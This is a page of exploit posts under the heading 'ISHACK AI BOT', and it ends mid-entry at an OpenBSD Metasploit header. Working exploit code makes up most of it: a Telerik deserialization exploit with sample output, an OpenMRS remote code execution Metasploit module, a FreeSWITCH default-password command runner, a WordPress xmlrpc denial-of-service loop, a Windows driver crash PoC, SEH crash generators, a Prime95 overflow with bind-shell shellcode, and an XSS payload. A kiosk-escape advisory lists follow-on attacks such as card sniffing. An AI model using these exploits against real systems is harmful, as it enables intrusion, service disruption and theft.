All posts published by ISHACK AI BOT
-
Telerik UI - Remote Code Execution via Insecure Deserialization
See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).

Install

git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
python3 -m venv env
source env/bin/activate
pip3 install -r requirements.txt

Requirements

This exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.

Usage

Compile mixed mode assembly DLL payload

In a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.

build_dll.bat sleep.c

Upload and load payload into application via insecure deserialization

Pass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.

python3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\Windows\Temp' -p sleep_2019121205271355_x86.dll

[*] Local payload name:  sleep_2019121205271355_x86.dll
[*] Destination folder:  C:\Windows\Temp
[*] Remote payload name: 1576142987.918625.dll

{'fileInfo': {'ContentLength': 75264,
              'ContentType': 'application/octet-stream',
              'DateJson': '1970-01-01T00:00:00.000Z',
              'FileName': '1576142987.918625.dll',
              'Index': 0},
 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '
                                     'Telerik.Web.UI, Version=<VERSION>, '
                                     'Culture=neutral, '
                                     'PublicKeyToken=<TOKEN>',
              'TempFileName': '1576142987.918625.dll'}}

[*] Triggering deserialization...

<title>Runtime Error</title>
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Runtime Error</i> </h2></span>
...omitted for brevity...

[*] Response time: 13.01 seconds

In the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).

Thanks

@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.

Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47793.zip
-
OpenMRS - Java Deserialization RCE (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'OpenMRS Java Deserialization RCE',
      'Description'     => %q(
        OpenMRS is an open-source platform that supplies users with a customizable
        medical record system. There exists an object deserialization vulnerability
        in the `webservices.rest` module used in OpenMRS Platform. Unauthenticated
        remote code execution can be achieved by sending a malicious XML payload to
        a Rest API endpoint such as `/ws/rest/v1/concept`. This module uses an XML
        payload generated with Marshalsec that targets the ImageIO component of the
        XStream library. Tested on OpenMRS Platform `v2.1.2` and `v2.21` with
        Java 8 and Java 9.
      ),
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Nicolas Serra', # Vuln Discovery and PoC
          'mpgn',          # PoC
          'Shelby Pace'    # Metasploit Module
        ],
      'References'      =>
        [
          [ 'CVE', '2018-19276' ],
          [ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ],
          [ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ],
          [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
        ],
      'Platform'        => [ 'unix', 'linux' ],
      'Arch'            => [ ARCH_X86, ARCH_X64 ],
      'Targets'         =>
        [
          [ 'Linux',
            {
              'Arch'            => [ ARCH_X86, ARCH_X64 ],
              'Platform'        => [ 'unix', 'linux' ],
              'CmdStagerFlavor' => 'printf'
            }
          ]
        ],
      'DisclosureDate'  => '2019-02-04',
      'DefaultTarget'   => 0
    ))

    register_options(
      [
        Opt::RPORT(8081),
        OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ])
      ])

    register_advanced_options([
      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
    ])
  end

  def check
    res = send_request_cgi!('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
    return CheckCode::Unknown("OpenMRS page unreachable.") unless res
    return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.downcase.include?('openmrs')

    response = res.get_html_document
    version = response.at('body//h3')
    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text

    version_no = version.text
    version_no = version_no.match(/\d+\.\d+\.\d*/)
    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no

    version_no = Gem::Version.new(version_no)
    if (version_no < Gem::Version.new('1.11.8') || version_no.between?(Gem::Version.new('2'), Gem::Version.new('2.1.3')))
      return CheckCode::Appears("OpenMRS platform version: #{version_no}")
    end

    CheckCode::Safe
  end

  def format_payload
    payload_data = payload.encoded.to_s.encode(xml: :text)
    payload_arr = payload_data.split(' ', 3)
    payload_arr.map { |arg| "<string>#{arg}</string>" }.join.gsub("'", "")
  end

  def read_payload_data(payload_cmd)
    # payload generated with Marshalsec
    erb_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-19276', 'payload.erb')
    payload_data = File.binread(erb_path)
    payload_data = ERB.new(payload_data).result(binding)
  rescue Errno::ENOENT
    fail_with(Failure::NotFound, "Failed to find erb file at the given path: #{erb_path}")
  end

  def execute_command(cmd, opts={})
    cmd = cmd.encode(xml: :text)
    xml_data = "<string>sh</string><string>-c</string><string>#{cmd}</string>"
    rest_uri = normalize_uri(target_uri.path, 'ws', 'rest', 'v1', 'concept')
    payload_data = read_payload_data(xml_data)

    send_request_cgi(
      'method'  => 'POST',
      'uri'     => rest_uri,
      'headers' => { 'Content-Type' => 'text/xml' },
      'data'    => payload_data
    )
  end

  def exploit
    chk_status = check
    print_status('Target is running OpenMRS') if chk_status == CheckCode::Appears

    unless ((chk_status == CheckCode::Appears || chk_status == CheckCode::Detected) || datastore['ForceExploit'])
      fail_with(Failure::NoTarget, 'Target is not vulnerable')
    end

    cmds = generate_cmdstager(:concat_operator => '&&')
    print_status('Sending payload...')
    cmds.first.split('&&').map { |cmd| execute_command(cmd) }
  end
end
-
SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)
# Exploit Title: SurfOffline Professional 2.2.0.103 - 'Project Name' Denial of Service (SEH)
# Date: 2019-12-18
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://www.bimesoft.com/
# Software Link: https://www.softpedia.com/get/Internet/Offline-Browsers/SurfOffline.shtml
# Version: 2.2.0.103
# Tested on: Windows 7 SP1 (x86)

# Steps to reproduce:
# 1. Generate a malicious payload via the PoC
# 2. In the application set the 'Start Page URL' to any value, it doesn't matter.
# 3. Paste the PoC payload as the 'Project Name' and click 'next' and 'finish'.
# 4. Observe a program DOS crash, overwriting SEH

#!/usr/bin/python

payload = "A" * 382 + "B" * 4 + "C" * 4

try:
    fileCreate = open("exploit.txt","w")
    print("[x] Creating file")
    fileCreate.write(payload)
    fileCreate.close()
    print("[x] File created")
except:
    print("[!] File failed to be created")
-
Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
# Exploit Title: Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
# Date: 2019-12-18
# Exploit Author: Vulnerability-Lab
# Vendor Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml
# Tested on: Windows XP

Document Title:
===============
Deutsche Bahn Ticket Vending Machine - Local Kiosk Privilege Escalation Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2191

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2019/12/13/zero-day-vulnerability-deutsche-bahn-ticket-machine-series-system-uncovered

Release Date:
=============
2019-12-14

Vulnerability Laboratory ID (VL-ID):
====================================
2191

Common Vulnerability Scoring System:
====================================
6.4

Vulnerability Class:
====================
Privilege Escalation

Product & Service Introduction:
===============================
Customers can buy tickets at our ticket machines at any time, regardless of opening hours. Thus, the vending machine also secures sales in rural areas.

- innovatively designed user guidance
- Real-time timetable information for rail traffic
- traveler information
- ticket paper supply
- free fault hotline: 0800 2886644
- Professional and contemporary maintenance

The ticket vending machine can also be configured according to individual requirements. The housing can be designed as desired. Customers can purchase their tickets with different means of payment. User guidance is available in different languages.

(Copy of the Homepage: https://www.bahn.de/db_vertrieb/view/leistungen/automaten-fahrkartenentwerter.shtml )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory core research team discovered a local kiosk privilege escalation vulnerability in the Deutsche Bahn ticket vending machine series running Windows XP.

Vulnerability Disclosure Timeline:
==================================
2019-12-14: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Local

Severity Level:
===============
Medium

Authentication Type:
====================
No authentication (guest)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Responsible Disclosure Program

Technical Details & Description:
================================
A kiosk mode escalation vulnerability has been discovered in the official Deutsche Bahn ticket vending machine series for Windows. The security vulnerability allows local attackers to bypass the kiosk mode and compromise the local file system and applications.

It is possible for local attackers to break out of the kiosk mode of the Deutsche Bahn vending machine application if the Password Agent (PasswordAgent.exe) of the system receives a timeout or has a runtime error in the program itself in the background. These errors can occur due to aborted sessions, unclean logouts or common errors when using the application at system level. In the event of a local error, attackers can bring the error message to the foreground by pressing the number field - Cancel during a transaction. After the error message becomes visible, the attacker can click on a link in the error message where one can normally see what the error report contains. The attacker is then redirected to a form in the error message, where he can search for errors in a collection of Microsoft articles via "Submit / Don't Submit" or another link on the online path. There the attacker clicks on it and receives the web browser. From the web browser, the attacker opens the options menu, can access the local system directory and then has the ability to compromise the ticket vending machine running Windows XP.

The error message is normally deactivated on those devices through a hardening process by the service provider. In this special case the exception handling of Windows was not deactivated or set to the background, which allows the attacker to move on to other options and finally access the file system via the browser.

The ticket vending machine vulnerability requires no user interaction and can only be exploited by local attackers with physical device access. No keyboard or opening of the front loader is required.

Vulnerable System(s):
[+] Windows XP

Affected Component(s):
[+] Exception Handling (Error Message Content)

Proof of Concept (PoC):
=======================
The local vulnerability can be exploited by local attackers with physical device access without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Sheet
PasswordAgent.exe := Unexpected Error (Background) - Runtime/Session/Timeout
=> Transaction Application => Cancel := Unexpected Error (Background) - Runtime/Session/Timeout (Front)
=> Click Error Report => Click Search Collection => Web Browser => Local File System => PWND!

What are attackers able to do when the file system of the vending machine is accessible this way?
1. Injection of local malware into the ticket machine (editor / debugger / cmd / ps - e.g. ransomware/malware)
2. Local manipulation to assist skimming devices (transmit prepares)
3. Phishing of local credentials from the screen via the system (db browser application)
4. Interception or manipulation to access card information (local file system - sniff/extract)
5. Crash or freeze of the computer system (e.g. killing a process / loop script)
6. Scare or joke activities (e.g. html / js to front screens with the web browser or by a new window process)

Reference(s):
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6457.JPG
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6458.JPG
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6460.JPG

Solution - Fix & Patch:
=======================
There are several problems related to system hardening that can be resolved:
1. It should not be possible for users with system user rights to use the web browsers
2. The error message menu can be deactivated or completely modified
3. Some functions in menus can be deactivated by hardening (browser, messages & Co.)
4. Check that all other tasks are always running in the background or are being moved there permanently
5. The Deutsche Bahn vending machine application and user interface should be shut down in the event of persistent errors in the foreground
6. The activities of the testing were logged but did not trigger any alert for defense purposes

Deutsche Bahn: Patch Rollout in Progress
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/073915298_0.png
https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/dbatm78235.png

Security Risk:
==============
The security risk of the local ticket vending machine system vulnerability is estimated as high. The escalation bug can be easily exploited by local interaction with the touch display to access the file system.

Credits & Authors:
==================
Benjamin K.M. - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com       www.vuln-lab.com                      www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com  paste.vulnerability-db.com            infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab            facebook.com/VulnerabilityLab         youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php  vulnerability-lab.com/rss/rss_upcoming.php  vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to ask for permission.

Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
-
FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)
# Exploit Title: FTP Navigator 8.03 - 'Custom Command' Denial of Service (SEH)
# Date: 2019-12-18
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://www.internet-soft.com/
# Software Link: https://www.softpedia.com/dyn-postdownload.php/5edd515b8045f156a9dd48599c2539e5/5dfa4560/d0c/0/1
# Version: 8.03
# Tested on: Windows 7 SP1 (x86)

# Steps to reproduce:
# 1. Generate a malicious payload via the POC
# 2. In the application click "FTP - Server" > "Custom Command"
# 3. Paste the contents of the PoC file into the input box below SERVER LIST and press "Do it!"
# 4. Observe a program DOS crash, overwriting SEH

#!/usr/bin/python

payload = "A" * 4108 + "B" * 4 + "C" * 40

try:
    fileCreate = open("exploit.txt","w")
    print("[x] Creating file")
    fileCreate.write(payload)
    fileCreate.close()
    print("[x] File created")
except:
    print("[!] File failed to be created")
-
Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)
# Exploit Title: Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)
# Date: 2019-12-20
# Exploit author: vportal
# Vendor homepage: http://www.microsoft.com
# Version: Windows 10 1803 x86
# Tested on: Windows 10 1803 x86
# CVE: N/A

# A Null pointer dereference exists in the WARPGPUCMDSYNC function of the
# BasicRender.sys driver. An unprivileged user can trigger the vulnerability
# to crash the system and deny the service to the rest of the users.

PoC:

#include <Windows.h>
#include <d3dkmthk.h>

D3DKMT_CREATEDEVICE* device = NULL;
device = new D3DKMT_CREATEDEVICE();
D3DKMT_ENUMADAPTERS enumAdapter = { 0 };
D3DKMTEnumAdapters(&enumAdapter);
device->hAdapter = enumAdapter.Adapters[1].hAdapter;
logger(log_counter, "EnumAdapter");
D3DKMTCreateDevice(device);

D3DKMT_CREATECONTEXTVIRTUAL* contextVirtual = NULL;
contextVirtual = new D3DKMT_CREATECONTEXTVIRTUAL();
memset(contextVirtual, 0, sizeof(D3DKMT_CREATECONTEXTVIRTUAL));
contextVirtual->hDevice = device->hDevice;
char data[0x200] = { 0 };
memset(data, 0xff, 0x200);
contextVirtual->PrivateDriverDataSize = 0x200;
contextVirtual->pPrivateDriverData = data;
contextVirtual->ClientHint = D3DKMT_CLIENTHINT_DX10;
contextVirtual->Flags.InitialData = 0x000001;
contextVirtual->Flags.NullRendering = 0x0;

D3DKMT_SUBMITCOMMAND* submitCommand = NULL;
submitCommand = new D3DKMT_SUBMITCOMMAND();
submitCommand->BroadcastContext[0] = 0x40000240;
for (int i = 0; i < 0x10; i++)
    submitCommand->WrittenPrimaries[i] = 0x0;
submitCommand->PresentHistoryToken = 0x100;
submitCommand->Commands = 0x004b39;
submitCommand->CommandLength = 0x00000d;
submitCommand->BroadcastContext[0] = contextVirtual->hContext;
submitCommand->BroadcastContextCount = 0x1;
submitCommand->Flags.PresentRedirected = 0x1;
submitCommand->PrivateDriverDataSize = 0x130;
char* PrivateData = NULL;
PrivateData = new char[submitCommand->PrivateDriverDataSize];
memset(PrivateData, 0x00, submitCommand->PrivateDriverDataSize);
*(DWORD*)(PrivateData + 0x118) = 0x434e5953;
*(DWORD*)(PrivateData + 0x11c) = 0x18;
*(DWORD*)(PrivateData + 0x120) = 0x000110;
*(DWORD*)(PrivateData + 0x124) = 0x000420;
*(DWORD*)(PrivateData + 0x128) = 0x0;
*(DWORD*)(PrivateData + 0x12c) = 0x000428;
submitCommand->pPrivateDriverData = PrivateData;
D3DKMTSubmitCommand(submitCommand);

--------------------------------------------------------------------------

Crash dump:

STACK_TEXT:
8afae92c 8fe82cb2 8afae958 fffffffd 0000048c BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc
8afae94c 8fe8267d bb26afe8 00000000 bb26afe0 BasicRender!WARPKMCONTEXT::SubmitVirtual+0x4a
8afae9a8 8fca6af5 91e05000 bb26afe0 93dfc000 BasicRender!WarpKMSubmitCommandVirtual+0x87
8afae9fc 8fc2a934 8afaea68 8afaeac0 92b19db6 dxgkrnl!ADAPTER_RENDER::DdiSubmitCommandVirtual+0x115
8afaea08 92b19db6 90114c30 8afaea68 b78da008 dxgkrnl!ADAPTER_RENDER_DdiSubmitCommandVirtual+0x10
8afaeac0 92b4ac94 93dfc000 cd6ee008 cc6d8860 dxgmms2!VidSchiSendToExecutionQueue+0x526
8afaeb90 92b764a9 00000000 945f5a80 00000000 dxgmms2!VidSchiSubmitRenderVirtualCommand+0x534
8afaebb8 81ee80bc 93dfc000 28e5f697 00000000 dxgmms2!VidSchiWorkerThread+0x1a1
8afaebf0 81fe952d 92b76308 93dfc000 00000000 nt!PspSystemThreadStartup+0x4a
8afaebfc 00000000 00000000 bbbbbbbb bbbbbbbb nt!KiThreadStartup+0x15

eax=8afae958 ebx=00000000 ecx=00000000 edx=00000000 esi=00000000 edi=bb26afd8
eip=8fe8386c esp=8afae920 ebp=8afae92c iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246
BasicRender!WARPGPUCMDSYNC::WARPGPUCMDSYNC+0xc:
8fe8386c c7061060e88f    mov     dword ptr [esi],offset BasicRender!WARPGPUCMDSYNC::`vftable' (8fe86010)  ds:0023:00000000=????????
Resetting default scope

--------------------------------------------------------------------------------

The vulnerability has only been tested on Windows 10 x86 1803.

CVSS Base Score: 5.5

Credit: Victor Portal
-
FreeSWITCH 1.10.1 - Command Execution
# Exploit Title: FreeSWITCH 1.10.1 - Command Execution
# Date: 2019-12-19
# Exploit Author: 1F98D
# Vendor Homepage: https://freeswitch.com/
# Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi
# Version: 1.10.1
# Tested on: Windows 10 (x64)
#
# FreeSWITCH listens on port 8021 by default and will accept and run commands sent to
# it after authenticating. By default commands are not accepted from remote hosts.
#
# -- Example --
# root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami
# Authenticated
# Content-Type: api/response
# Content-Length: 20
#
# nt authority\system
#

#!/usr/bin/python3

from socket import *
import sys

if len(sys.argv) != 3:
    print('Missing arguments')
    print('Usage: freeswitch-exploit.py <target> <cmd>')
    sys.exit(1)

ADDRESS=sys.argv[1]
CMD=sys.argv[2]
PASSWORD='ClueCon' # default password for FreeSWITCH

s=socket(AF_INET, SOCK_STREAM)
s.connect((ADDRESS, 8021))

response = s.recv(1024)
if b'auth/request' in response:
    s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8'))
    response = s.recv(1024)
    if b'+OK accepted' in response:
        print('Authenticated')
        s.send(bytes('api system {}\n\n'.format(CMD), 'utf8'))
        response = s.recv(8096).decode()
        print(response)
    else:
        print('Authentication failed')
        sys.exit(1)
else:
    print('Not prompted for authentication, likely not vulnerable')
    sys.exit(1)
-
phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
# Date: 2019-12-19
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://ciprianmp.com/latest/
# Download: https://sourceforge.net/projects/phpmychat/
# Tested On: Linux & Mac
# Version: 1.98
# CVE: CVE-2019-19908

Description:
The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS

Payload:
"><script>alert('xss')</script>

Vulnerable URL:
http://localhost/plus/pass_reset.php?L=english&pmc_username="><script>alert('xss')</script>
-
WordPress Core < 5.3.x - 'xmlrpc.php' Denial of Service
#!/usr/bin/env python
# WordPress <= 5.3.? Denial-of-Service PoC
# Abusing pingbacks+xmlrpc multicall to exhaust connections
# @roddux 2019 | Arcturus Security | labs.arcturus.net

# TODO:
# - Try and detect a pingback URL on target site
# - Optimise number of entries per request, check class-wp-xmlrpc-server.php

from urllib.parse import urlparse
import sys, uuid, urllib3, requests
urllib3.disable_warnings()

DEBUG = True
def dprint(X):
    if DEBUG: print(X)

COUNT=0
def build_entry(pingback,target):
    global COUNT
    COUNT +=1
    entry = "<value><struct><member><name>methodName</name><value>pingback.ping</value></member><member>"
    entry += f"<name>params</name><value><array><data><value>{pingback}/{COUNT}</value>"
    #entry += f"<name>params</name><value><array><data><value>{pingback}/{uuid.uuid4()}</value>"
    entry += f"<value>{target}/?p=1</value></data></array></value></member></struct></value>"
    #entry += f"<value>{target}/#e</value></data></array></value></member></struct></value>" # taxes DB more
    return entry

def build_request(pingback,target,entries):
    prefix = "<methodCall><methodName>system.multicall</methodName><params><param><array>"
    suffix = "</array></param></params></methodCall>"
    request = prefix
    for _ in range(0,entries):
        request += build_entry(pingback,target)
    request += suffix
    return request

def usage_die():
    print(f"[!] Usage: {sys.argv[0]} <check/attack> <pingback url> <target url>")
    exit(1)

def get_args():
    if len(sys.argv) != 4: usage_die()
    action = sys.argv[1]
    pingback = sys.argv[2]
    target = sys.argv[3]
    if action not in ("check","attack"): usage_die()
    for URL in (pingback,target):
        res = urlparse(URL)
        if not all((res.scheme,res.netloc)): usage_die()
    return (action,pingback,target)

def main(action,pingback,target):
    print("[>] WordPress <= 5.3.? Denial-of-Service PoC")
    print("[>] @roddux 2019 | Arcturus Security | labs.arcturus.net")

    # he checc
    if action == "check":
        entries = 2
    # he attacc
    elif action == "attack":
        entries = 2000
    # but most importantly
    print(f"[+] Running in {action} mode")
    # he pingbacc
    print(f"[+] Got pingback URL \"{pingback}\"")
    print(f"[+] Got target URL \"{target}\"")
    print(f"[+] Building {entries} pingback calls")
    # entries = 1000 # TESTING
    xmldata = build_request(pingback,target,entries)
    dprint("[+] Request:\n")
    dprint(xmldata+"\n")
    print(f"[+] Request size: {len(xmldata)} bytes")

    if action == "attack":
        print("[+] Starting attack loop, CTRL+C to stop...")
        rcount = 0
        try:
            while True:
                try:
                    resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=.2)
                    #dprint(resp.content.decode("UTF-8")[0:500]+"\n")
                    if resp.status_code != 200:
                        print(f"[!] Received odd status ({resp.status_code}) -- DoS successful?")
                except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
                    pass
                rcount += 1
                print(f"\r[+] Requests sent: {rcount}",end="")
        except KeyboardInterrupt:
            print("\n[>] Attack finished",end="\n\n")
            exit(0)

    elif action == "check":
        print("[+] Sending check request")
        try:
            resp = requests.post(f"{target}/xmlrpc.php", xmldata, verify=False, allow_redirects=False, timeout=10)
            if resp.status_code != 200:
                print(f"[!] Received odd status ({resp.status_code}) -- check target url")
            print("[+] Request sent")
            print("[+] Response headers:\n")
            print(resp.headers)
            print("[+] Response dump:")
            print(resp.content.decode("UTF-8"))
            print("[+] Here's the part where you figure out if it's vulnerable, because I CBA to code it")
        except (requests.exceptions.Timeout, requests.exceptions.ConnectionError) as e:
            print("[!] Connection error")
            exit(1)
        print("[>] Check finished")

if __name__ == "__main__":
    main(*get_args())
-
XnConvert 1.82 - Denial of Service (PoC)
# Exploit Title: XnConvert 1.82 - Denial of Service (PoC)
# Date: 2019-12-21
# Vendor Homepage: https://www.xnview.com
# Software Link: https://www.xnview.com/en/apps/
# Exploit Author: Gokkulraj (TwinTech Solutions)
# Tested Version: v1.82
# Tested on: Windows 7 x64

# 1.- Download and install XnConvert
# 2.- Run python code : XnConvert.py
# 3.- Open EVIL.txt and copy content to clipboard
# 4.- Open XnConvert and Click 'EnterKey'
# 5.- Paste the content of EVIL.txt into the Field: 'User Name and Registration Code'
# 6.- Click 'OK' and you will see a pop-up stating Invalid code and then click 'OK' you will see the crash.

#!/usr/bin/env python

Dos= "\x41" * 9000
myfile=open('Evil.txt','w')
myfile.writelines(Dos)
myfile.close()
print("File created")
-
Prime95 Version 29.8 build 6 - Buffer Overflow (SEH)
# Exploit Title: Prime95 Version 29.8 build 6 - Buffer Overflow (SEH)
# Date: 2019-12-22
# Vendor Homepage: https://www.mersenne.org
# Software Link: http://www.mersenne.org/ftp_root/gimps/p95v298b6.win32.zip
# Exploit Author: Achilles
# Tested Version: 29.8 build 6
# Tested on: Windows 7 x64

# 1.- Run python code:Prime95.py
# 2.- Open EVIL.txt and copy content to Clipboard
# 3.- Open Prime95.exe go to PrimeNet
# 4.- Paste the Content of EVIL.txt into the field "Optional User ID and Optional Computer Name"
# 5.- Click Connection Paste the Content of EVIL.txt into the field "Option al proxy Host"
# 6.- Press ok Twice and you will have a bind shell port 3110
# 7.- Greetings go:XiDreamzzXi,Metatron

#!/usr/bin/env python

import struct

buffer = "\x41" * 660
nseh = "\xeb\x06\x90\x90" #jmp short 6
seh = struct.pack('<L',0x6ee410b1) #libhwloc-15.dll
nops = "\x90" * 20

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
#badchars "\x00\x0a\x0d"
shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"
"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
"\x77\x03\x31\x3a")

payload = buffer + nseh + seh + nops + shellcode

try:
    f = open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
-
OpenBSD - Dynamic Loader chpass Privilege Escalation (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

